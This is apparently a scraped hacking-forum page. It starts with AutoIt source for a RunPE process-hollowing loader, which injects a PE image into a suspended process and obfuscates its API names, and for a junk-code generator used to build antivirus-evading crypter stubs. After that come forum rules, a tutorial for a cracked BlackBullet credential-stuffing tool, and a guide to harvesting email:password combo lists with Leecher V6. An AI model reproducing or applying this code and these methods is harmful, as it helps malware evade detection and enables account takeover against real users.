uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & _ ; Floating point state (types are not correct for simplicity reasons!!!) "uint64 VectorRegister[52]; uint64 VectorControl;" & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!) "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") ; Special debug control registers Else $iRunFlag = 3 ; FIXME - Itanium architecture ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(102, 0, 0) EndIf Else $iRunFlag = 1 $tCONTEXT = DllStructCreate("dword ContextFlags;" & _ ; Control flags "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & _ ; CONTEXT_DEBUG_REGISTERS "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & _ ; CONTEXT_FLOATING_POINT "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & _ ; CONTEXT_SEGMENTS "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & _ ; CONTEXT_INTEGER "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & _ ; CONTEXT_CONTROL "byte ExtendedRegisters[512]") ; CONTEXT_EXTENDED_REGISTERS EndIf ; Define CONTEXT_FULL Local $CONTEXT_FULL Switch $iRunFlag Case 1 $CONTEXT_FULL = 0x10007 Case 2 $CONTEXT_FULL = 0x100007 Case 3 $CONTEXT_FULL = 0x80027 EndSwitch ; Set desired access DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL) ; Fill CONTEXT structure: $aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", _ "handle", $hThread, _ "ptr", DllStructGetPtr($tCONTEXT)) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed EndIf ; Pointer to PEB structure Local $pPEB Switch $iRunFlag Case 1 $pPEB = DllStructGetData($tCONTEXT, "Ebx") Case 2 $pPEB = DllStructGetData($tCONTEXT, "Rdx") Case 3 ; NEVER BE - Itanium architecture EndSwitch #Region 5. READ PE-FORMAT ; Start processing passed binary data. 'Reading' PE format follows. ; First is IMAGE_DOS_HEADER Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _ "word BytesOnLastPage;" & _ "word Pages;" & _ "word Relocations;" & _ "word SizeofHeader;" & _ "word MinimumExtra;" & _ "word MaximumExtra;" & _ "word SS;" & _ "word SP;" & _ "word Checksum;" & _ "word IP;" & _ "word CS;" & _ "word Relocation;" & _ "word Overlay;" & _ "char Reserved[8];" & _ "word OEMIdentifier;" & _ "word OEMInformation;" & _ "char Reserved2[20];" & _ "dword AddressOfNewExeHeader", _ $pPointer) ; Save this pointer value (it's starting address of binary image headers) Local $pHEADERS_NEW = $pPointer ; Move pointer $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header ; Get "Magic" Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic") ; Check if it's valid format If Not ($sMagic == "MZ") Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(4, 0, 0) ; MS-DOS header missing. EndIf ; In place of IMAGE_NT_SIGNATURE Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer) ; Move pointer $pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure ; Check signature If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword. EndIf ; In place of IMAGE_FILE_HEADER Local $tIMAGE_FILE_HEADER = DllStructCreate("word Machine;" & _ "word NumberOfSections;" & _ "dword TimeDateStamp;" & _ "dword PointerToSymbolTable;" & _ "dword NumberOfSymbols;" & _ "word SizeOfOptionalHeader;" & _ "word Characteristics", _ $pPointer) ; I could check here if the module is relocatable ; Local $fRelocatable ; If BitAND(DllStructGetData($tIMAGE_FILE_HEADER, "Characteristics"), 1) Then $fRelocatable = False ; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead) ; Get number of sections Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections") ; Move pointer $pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure ; In place of IMAGE_OPTIONAL_HEADER Local $tMagic = DllStructCreate("word Magic;", $pPointer) Local $iMagic = DllStructGetData($tMagic, 1) Local $tIMAGE_OPTIONAL_HEADER If $iMagic = 267 Then ; x86 version If $fAutoItX64 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _ "byte MajorLinkerVersion;" & _ "byte MinorLinkerVersion;" & _ "dword SizeOfCode;" & _ "dword SizeOfInitializedData;" & _ "dword SizeOfUninitializedData;" & _ "dword AddressOfEntryPoint;" & _ "dword BaseOfCode;" & _ "dword BaseOfData;" & _ "dword ImageBase;" & _ "dword SectionAlignment;" & _ "dword FileAlignment;" & _ "word MajorOperatingSystemVersion;" & _ "word MinorOperatingSystemVersion;" & _ "word MajorImageVersion;" & _ "word MinorImageVersion;" & _ "word MajorSubsystemVersion;" & _ "word MinorSubsystemVersion;" & _ "dword Win32VersionValue;" & _ "dword SizeOfImage;" & _ "dword SizeOfHeaders;" & _ "dword CheckSum;" & _ "word Subsystem;" & _ "word DllCharacteristics;" & _ "dword SizeOfStackReserve;" & _ "dword SizeOfStackCommit;" & _ "dword SizeOfHeapReserve;" & _ "dword SizeOfHeapCommit;" & _ "dword LoaderFlags;" & _ "dword NumberOfRvaAndSizes", _ $pPointer) ; Move pointer $pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER ElseIf $iMagic = 523 Then ; x64 version If Not $fAutoItX64 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _ "byte MajorLinkerVersion;" & _ "byte MinorLinkerVersion;" & _ "dword SizeOfCode;" & _ "dword SizeOfInitializedData;" & _ "dword SizeOfUninitializedData;" & _ "dword AddressOfEntryPoint;" & _ "dword BaseOfCode;" & _ "uint64 ImageBase;" & _ "dword SectionAlignment;" & _ "dword FileAlignment;" & _ "word MajorOperatingSystemVersion;" & _ "word MinorOperatingSystemVersion;" & _ "word MajorImageVersion;" & _ "word MinorImageVersion;" & _ "word MajorSubsystemVersion;" & _ "word MinorSubsystemVersion;" & _ "dword Win32VersionValue;" & _ "dword SizeOfImage;" & _ "dword SizeOfHeaders;" & _ "dword CheckSum;" & _ "word Subsystem;" & _ "word DllCharacteristics;" & _ "uint64 SizeOfStackReserve;" & _ "uint64 SizeOfStackCommit;" & _ "uint64 SizeOfHeapReserve;" & _ "uint64 SizeOfHeapCommit;" & _ "dword LoaderFlags;" & _ "dword NumberOfRvaAndSizes", _ $pPointer) ; Move pointer $pPointer += 112 ; size of $tIMAGE_OPTIONAL_HEADER Else DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf ; Extract entry point address Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address ; And other interesting informations Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers ; Move pointer $pPointer += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT $pPointer += 8 ; size of $tIMAGE_DIRECTORY_ENTRY_IMPORT $pPointer += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY ; Base Relocation Directory Local $tIMAGE_DIRECTORY_ENTRY_BASERELOC = DllStructCreate("dword VirtualAddress; dword Size", $pPointer) ; Collect data Local $pAddressNewBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "VirtualAddress") Local $iSizeBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "Size") Local $fRelocatable If $pAddressNewBaseReloc And $iSizeBaseReloc Then $fRelocatable = True If Not $fRelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) ; nothing can be done here ; Move pointer $pPointer += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them). #Region 6. ALLOCATE 'NEW' MEMORY SPACE Local $fRelocate Local $pZeroPoint If $fRelocatable Then ; If the module can be relocated then allocate memory anywhere possible $pZeroPoint = _RunBinary_AllocateExeSpace($hProcess, $iOptionalHeaderSizeOfImageNEW) ; In case of failure try at original address If @error Then $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW) ; Try now $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(101, 1, 0) EndIf EndIf EndIf $fRelocate = True Else ; And if not try where it should be $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW) ; Try now $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(101, 0, 0) EndIf EndIf EndIf ; If there is new ImageBase value, save it DllStructSetData($tIMAGE_OPTIONAL_HEADER, "ImageBase", $pZeroPoint) #Region 7. CONSTRUCT THE NEW MODULE ; Allocate enough space (in our space) for the new module Local $tModule = DllStructCreate("byte[" & $iOptionalHeaderSizeOfImageNEW & "]") ; Get pointer Local $pModule = DllStructGetPtr($tModule) ; Headers Local $tHeaders = DllStructCreate("byte[" & $iOptionalHeaderSizeOfHeadersNEW & "]", $pHEADERS_NEW) ; Write headers to $tModule DllStructSetData($tModule, 1, DllStructGetData($tHeaders, 1)) ; Write sections now. $pPointer is currently in place of sections Local $tIMAGE_SECTION_HEADER Local $iSizeOfRawData, $pPointerToRawData Local $iVirtualAddress, $iVirtualSize Local $tRelocRaw ; Loop through sections For $i = 1 To $iNumberOfSections $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _ "dword UnionOfVirtualSizeAndPhysicalAddress;" & _ "dword VirtualAddress;" & _ "dword SizeOfRawData;" & _ "dword PointerToRawData;" & _ "dword PointerToRelocations;" & _ "dword PointerToLinenumbers;" & _ "word NumberOfRelocations;" & _ "word NumberOfLinenumbers;" & _ "dword Characteristics", _ $pPointer) ; Collect data $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData") $pPointerToRawData = $pHEADERS_NEW + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData") $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress") $iVirtualSize = DllStructGetData($tIMAGE_SECTION_HEADER, "UnionOfVirtualSizeAndPhysicalAddress") If $iVirtualSize And $iVirtualSize < $iSizeOfRawData Then $iSizeOfRawData = $iVirtualSize ; If there is data to write, write it If $iSizeOfRawData Then DllStructSetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pModule + $iVirtualAddress), 1, DllStructGetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pPointerToRawData), 1)) EndIf ; Relocations If $fRelocate Then If $iVirtualAddress <= $pAddressNewBaseReloc And $iVirtualAddress + $iSizeOfRawData > $pAddressNewBaseReloc Then $tRelocRaw = DllStructCreate("byte[" & $iSizeBaseReloc & "]", $pPointerToRawData + ($pAddressNewBaseReloc - $iVirtualAddress)) EndIf EndIf ; Move pointer $pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure Next ; Fix relocations If $fRelocate Then _RunBinary_FixReloc($pModule, $tRelocRaw, $pZeroPoint, $pOptionalHeaderImageBaseNEW, $iMagic = 523) ; Write newly constructed module to allocated space inside the $hProcess $aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _ "handle", $hProcess, _ "ptr", $pZeroPoint, _ "ptr", $pModule, _ "dword_ptr", $iOptionalHeaderSizeOfImageNEW, _ "dword_ptr*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(7, 0, 0) ; failure while writting new module binary EndIf #Region 8. PEB ImageBaseAddress MANIPULATION ; PEB structure definition Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _ "byte ReadImageFileExecOptions;" & _ "byte BeingDebugged;" & _ "byte Spare;" & _ "ptr Mutant;" & _ "ptr ImageBaseAddress;" & _ "ptr LoaderData;" & _ "ptr ProcessParameters;" & _ "ptr SubSystemData;" & _ "ptr ProcessHeap;" & _ "ptr FastPebLock;" & _ "ptr FastPebLockRoutine;" & _ "ptr FastPebUnlockRoutine;" & _ "dword EnvironmentUpdateCount;" & _ "ptr KernelCallbackTable;" & _ "ptr EventLogSection;" & _ "ptr EventLog;" & _ "ptr FreeList;" & _ "dword TlsExpansionCounter;" & _ "ptr TlsBitmap;" & _ "dword TlsBitmapBits[2];" & _ "ptr ReadOnlySharedMemoryBase;" & _ "ptr ReadOnlySharedMemoryHeap;" & _ "ptr ReadOnlyStaticServerData;" & _ "ptr AnsiCodePageData;" & _ "ptr OemCodePageData;" & _ "ptr UnicodeCaseTableData;" & _ "dword NumberOfProcessors;" & _ "dword NtGlobalFlag;" & _ "byte Spare2[4];" & _ "int64 CriticalSectionTimeout;" & _ "dword HeapSegmentReserve;" & _ "dword HeapSegmentCommit;" & _ "dword HeapDeCommitTotalFreeThreshold;" & _ "dword HeapDeCommitFreeBlockThreshold;" & _ "dword NumberOfHeaps;" & _ "dword MaximumNumberOfHeaps;" & _ "ptr ProcessHeaps;" & _ "ptr GdiSharedHandleTable;" & _ "ptr ProcessStarterHelper;" & _ "ptr GdiDCAttributeList;" & _ "ptr LoaderLock;" & _ "dword OSMajorVersion;" & _ "dword OSMinorVersion;" & _ "dword OSBuildNumber;" & _ "dword OSPlatformId;" & _ "dword ImageSubSystem;" & _ "dword ImageSubSystemMajorVersion;" & _ "dword ImageSubSystemMinorVersion;" & _ "dword GdiHandleBuffer[34];" & _ "dword PostProcessInitRoutine;" & _ "dword TlsExpansionBitmap;" & _ "byte TlsExpansionBitmapBits[128];" & _ "dword SessionId") ; Fill the structure $aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", _ "ptr", $hProcess, _ "ptr", $pPEB, _ ; pointer to PEB structure "ptr", DllStructGetPtr($tPEB), _ "dword_ptr", DllStructGetSize($tPEB), _ "dword_ptr*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure EndIf ; Change base address within PEB DllStructSetData($tPEB, "ImageBaseAddress", $pZeroPoint) ; Write the changes $aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _ "handle", $hProcess, _ "ptr", $pPEB, _ "ptr", DllStructGetPtr($tPEB), _ "dword_ptr", DllStructGetSize($tPEB), _ "dword_ptr*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(9, 0, 0) ; failure while changing base address EndIf #Region 9. NEW ENTRY POINT ; Entry point manipulation Switch $iRunFlag Case 1 DllStructSetData($tCONTEXT, "Eax", $pZeroPoint + $iEntryPointNEW) Case 2 DllStructSetData($tCONTEXT, "Rcx", $pZeroPoint + $iEntryPointNEW) Case 3 ; FIXME - Itanium architecture EndSwitch #Region 10. SET NEW CONTEXT ; New context: $aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", _ "handle", $hThread, _ "ptr", DllStructGetPtr($tCONTEXT)) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed EndIf #Region 11. RESUME THREAD ; And that's it!. Continue execution: $aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread) ; Check for errors or failure If @error Or $aCall[0] = -1 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(11, 0, 0) ; ResumeThread function or call to it failed EndIf #Region 12. CLOSE OPEN HANDLES AND RETURN PID DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hProcess) DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread) ; All went well. Return new PID: Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId") EndFunc Func _RunBinary_LeanAndMean() Local $aArr[18] = ["W", "r", "i", "t", "e", "P", "r", "o", "c", "e", "s", "s", "M", "e", "m", "o", "r", "y"], $sOut For $sChar In $aArr $sOut &= $sChar Next Return $sOut EndFunc Func _RunBinary_FixReloc($pModule, $tData, $pAddressNew, $pAddressOld, $fImageX64) Local $iDelta = $pAddressNew - $pAddressOld ; dislocation value Local $iSize = DllStructGetSize($tData) ; size of data Local $pData = DllStructGetPtr($tData) ; addres of the data structure Local $tIMAGE_BASE_RELOCATION, $iRelativeMove Local $iVirtualAddress, $iSizeofBlock, $iNumberOfEntries Local $tEnries, $iData, $tAddress Local $iFlag = 3 + 7 * $fImageX64 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10 While $iRelativeMove < $iSize ; for all data available $tIMAGE_BASE_RELOCATION = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pData + $iRelativeMove) $iVirtualAddress = DllStructGetData($tIMAGE_BASE_RELOCATION, "VirtualAddress") $iSizeofBlock = DllStructGetData($tIMAGE_BASE_RELOCATION, "SizeOfBlock") $iNumberOfEntries = ($iSizeofBlock - 8) / 2 $tEnries = DllStructCreate("word[" & $iNumberOfEntries & "]", DllStructGetPtr($tIMAGE_BASE_RELOCATION) + 8) ; Go through all entries For $i = 1 To $iNumberOfEntries $iData = DllStructGetData($tEnries, 1, $i) If BitShift($iData, 12) = $iFlag Then ; check type $tAddress = DllStructCreate("ptr", $pModule + $iVirtualAddress + BitAND($iData, 0xFFF)) ; the rest of $iData is offset DllStructSetData($tAddress, 1, DllStructGetData($tAddress, 1) + $iDelta) ; this is what's this all about EndIf Next $iRelativeMove += $iSizeofBlock WEnd Return 1 ; all OK! EndFunc Func _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pAddress, $iSize) ; Allocate Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _ "handle", $hProcess, _ "ptr", $pAddress, _ "dword_ptr", $iSize, _ "dword", 0x1000, _ ; MEM_COMMIT "dword", 64) ; PAGE_EXECUTE_READWRITE ; Check for errors or failure If @error Or Not $aCall[0] Then ; Try differently $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _ "handle", $hProcess, _ "ptr", $pAddress, _ "dword_ptr", $iSize, _ "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE "dword", 64) ; PAGE_EXECUTE_READWRITE ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate EndIf Return $aCall[0] EndFunc Func _RunBinary_AllocateExeSpace($hProcess, $iSize) ; Allocate space Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _ "handle", $hProcess, _ "ptr", 0, _ "dword_ptr", $iSize, _ "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE "dword", 64) ; PAGE_EXECUTE_READWRITE ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate Return $aCall[0] EndFunc Func _RunBinary_UnmapViewOfSection($hProcess, $pAddress) DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _ "ptr", $hProcess, _ "ptr", $pAddress) ; Check for errors only If @error Then Return SetError(1, 0, 0) ; Failure Return 1 EndFunc Func _RunBinary_IsWow64Process($hProcess) Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", _ "handle", $hProcess, _ "bool*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Failure Return $aCall[2] EndFunc The junk Function : #cs ---------------------------------------------------------------------------- AutoIt Version: Author: CarrotInBLack Script Function: Create a junk code for your autoIT script very easy With: - _JunkCreate($Value) EXAMPLE: _JunkCreate(10) will create 10 random junk codes (functions, variables, IF/ELSE and For) _RandomString() Creates a Random string with 10-15 caracters #ce ---------------------------------------------------------------------------- Func _RandomVersion() $rVersion = "" Dim $aRr[3] $digits = Random(2, 4, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(48, 57, 1)) & "." $aRr[1] = Chr(Random(48, 57, 1)) & "." $aRr[2] = Chr(Random(48, 57, 1)) & "." $arR2 = Chr(Random(48, 57, 1)) $rVersion &= $aRr[Random(0, 2, 1)] & $arR2 Next Return $rVersion EndFunc Func _RandomString() $rString = "" Dim $aRr[3] $digits = Random(10, 15, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $aRr[2] = Chr(Random(48, 57, 1)) $rString &= $aRr[Random(0, 2, 1)] Next Return $rString EndFunc Func _JunkVariables() $var = "" $varval = "" Dim $aRr[3] $digits = Random(10, 15, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $aRr[2] = Chr(Random(48, 57, 1)) $var &= $aRr[Random(0, 2, 1)] $varval &= $aRr[Random(0, 2, 1)] $variable = '$' & $var & ' = ' & '"' & $varval & '"' & @CRLF Next Return $variable EndFunc Func _JunkFor() $rString = _RandomString() $variable = _JunkVariables() $JunkFor = "For $" & $rString & " = 1 To " & Random(1, 15) & @CRLF & " " & $variable & "Next" & @CRLF Return $JunkFor EndFunc Func _JunkIfElse() $rString = _RandomString() $rString2 = _RandomString() $variable = _JunkVariables() $JunkIf = 'If ' & '"' & $rString & '" == "' & $rString2 & '" Then' & @CRLF & ' ' & $variable & 'EndIf' & @CRLF Return $JunkIf Endfunc Func _FunJunk($Value) $JunkFun = "" Dim $Round[4] For $i = 1 To $Value $Round[0] = _JunkVariables() $Round[2] = _JunkFor() $Round[3] = _JunkIfElse() $JunkFun &= $Round[Random(0, 3, 1)] Next Return $JunkFun EndFunc Func _RanParameters($Value) $JunkParam = "" For $i = 1 To $Value $JunkParam = "$" & _RandomString() & ", " Next Return $JunkParam EndFunc Func _JunkFunc() $FuncName = "" $Parameters = "" $Lparam = "" Dim $aRr[3] $digits = Random(7, 10, 1) $digits2 = Random(2, 5, 1) $digits3 = Random(1, 3, 1) $lastP = _RandomString() $Lparam &= "$" & $lastP $Parameters &= _RanParameters($digits3) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $aRr[2] = Chr(Random(48, 57, 1)) $FuncName &= $aRr[Random(0, 2, 1)] $RanFun = _FunJunk($digits2) $Function = 'Func ' & '_' & $FuncName & '(' & $Parameters & $Lparam & ')' & @CRLF & $RanFun & @CRLF & 'EndFunc' & @CRLF Next Return $Function EndFunc Func _JunkCreate($Value) $JunkCode = "" Dim $Round[4] For $i = 1 To $Value $Round[0] = _JunkVariables() $Round[1] = _JunkFunc() $Round[2] = _JunkFor() $Round[3] = _JunkIfElse() $JunkCode &= $Round[Random(0, 3, 1)] Next Return $JunkCode EndFunc This script includes: -junk code generation -icon changer -file informations randomizing -randomizing the stubs variables and function names
  11. 2 points
    - The first thing to know to have a good foundation and a good atmosphere are the inter-member rules. So more simply polite rules that seem obvious but escape some people. - If you have business to settle, chat or forum posts are not to be used as a means of settlement. Instead, use private messaging while remaining polite; if the problem persists, contact a forum administrator or moderator. - Teacher presentations must be approved by 5 members before being accepted. Each member is authorized to test the knowledge cited in the submitted submission. In addition the moderation team will have an undeniable right of veto on any presentation being admitted. On the contrary a presentation having 3 justified negative votes will be immediately refused. - Our forum dealing with a subject demanding a lot of rigor in the information control (Subject + Msg chat) I forbid all executable files (.exe / .bin / .run / .msi, etc etc) Failure to comply with this rule will result in a temporary or permanent ban depending on the number of recidivism. As the point above makes it clear, you will have to post all your software / scripts in uncompiled format (ie the source code). In addition, if you are the creator of the code, please document it so that it is understandable to others (without explaining each line) Finally, if the code comes from a third-party source, please provide the name of the creator and if available a link to the author's website. Anyone who does not respect this rule will be subject to various sanctions once again depending on the number of recidivism. - A presence on the chat is mandatory under pain of punishment, if you must be away for a long time, notify an administrator or moderator. Some absences can be unpredictable, you will be penalized only if you are connected and you do not speak on the cat. - The sale of cards / bank accounts, Paypal or any other means of payment is strictly prohibited, the ban will be final. - You are on a forum, thank you for sharing your knowledge with members with a lower level than you without remuneration. After registering on the forum, you must present yourself to the community in a clear, correctly spelled, and most accurate way possible in the field of computer science. Any new member not respecting this last rule will be refused by all the members. - The accepted teachers have the duty to control, in turn, the presentations of new members and so on. - DON'T USE ANY PROGRAM HERE ON YOUR PERSONAL COMPUTER, USE AN VIRTUAL MACHINE ! If you see a rule to add, please contact an administrator.
  12. 2 points
    DOWNLOAD LINK : [Hidden Content] Hello today, I'm going to introduce BlackBullet and its new mode of operation! This software was not created by the community this is a crack so potentially bindd with a virus! Use this software via a virtual machine! What's blackbullet ? At the first opening, you have: We can see The BB File and a "Converter" !! Explanations: BB in version 2.0.2 works with Configs in ==> .ini (original) BB in version 2.1.6 works in config ==> .bbc (encrypted) You understand it, this Converter serves you: * Either to change a config .ini in .bbc, or from .bbc to .ini Go on, we continue ==> Open the folder ==> BlackBullet 2.1.6 Cracked In this Dossier, we find: A folder ==> Combos A folder ==> Configs A folder ==> Proxies So you can accommodate your own Combos and Proxies !! We have everything at hand ... VERY IMPORTANT !!! Check that you have the file ==> Launcher.exe !! If not look in your Anti Virus, it is possible that he quarantined it ... (Nothing to fear though, it's a fake!) B / Launch of BB Now we will launch BB, to use ==> Launcher.exe You have several windows that start !!! The !! You click on ==> Login And that's BB in its Version 2.1.6 !! Come on, let's see the top tabs already: I will detail: * Configs Your chosen config is there !! WordLists ==> Combos As on the picture, We will search for it (Add), we name it, The Type, Purpose = Mix and ==> Accept !! Result: * Proxies If your Proxies are loaded at the end of the Manipulation, that must give it !! At this level, you can check them if you wish !! I pass directly ... Last Tab ==> BruteForcer !! First load Config ==> Select CFG Then the Combo ==> Select List At this moment you must have this !! Check a Last Time: Config The Combo Number of Bots - Normally they are determined in Auto if the Config is well done, otherwise Regulate yourself Bots !! * Your Proxies will appear as soon as you click ==> on Start !! If everything went well !! You should have a BB that looks like this in a running state ... Last Explanation on the Infos which are All right !!! COMBOS: Total = The Number of Accounts that is Tested Hits = Your HITS !!!!! Free = The Accounts that are here, are usually Accounts that ask for to change the Pass, When Connecting. Bad = Bad Retries = As under Sentry, The Relaunch of the Software (Sort of Rééssaie !!) PROXIES: Total: The number of your proxies Alive: Those who are on the move Banned: Those who are banned Bad: Those who are Bad CPM: Combo Per Minute !! this often expresses the "Health" of your Config They are more or less high !! If it stays Zero ==> Config Tired or Dead !! Here is this tutorial ends, I hope to have helped you to like Black Bullet !!
  13. 2 points
    Leecher V6 is a software that allows you to "leech" your own combo list. Combo list what is it? A combo list is a simple text file with valid and invalid identifiers, for example: philipe.albert@gmail.com: philipe50 EMAIL:Password Download link : [hide][Hidden Content]] DONT USE ON YOUR PERSONNAL COMPUTER USE IT IN A VIRTUAL MACHINE ! Start by putting the software on your virtual machine Start Leecher V0.6 Then insert the type of email you wish to have in your future Combo list. Go to the little logo setting and checked pastebin only. Choose Week or 24h instead of All results. Press START and wait a few minutes before pressing STOP. Press the button below in this order: Press load proxy and select the proxy present in your Leecher folder. Do the same with load links, you need to use the file you saved a few moments before. put the Thread at 150. press START and wait a few minutes before pressing STOP. (If your PC lacks power, the software may crash ...) Save the Combo list.
  14. 2 points
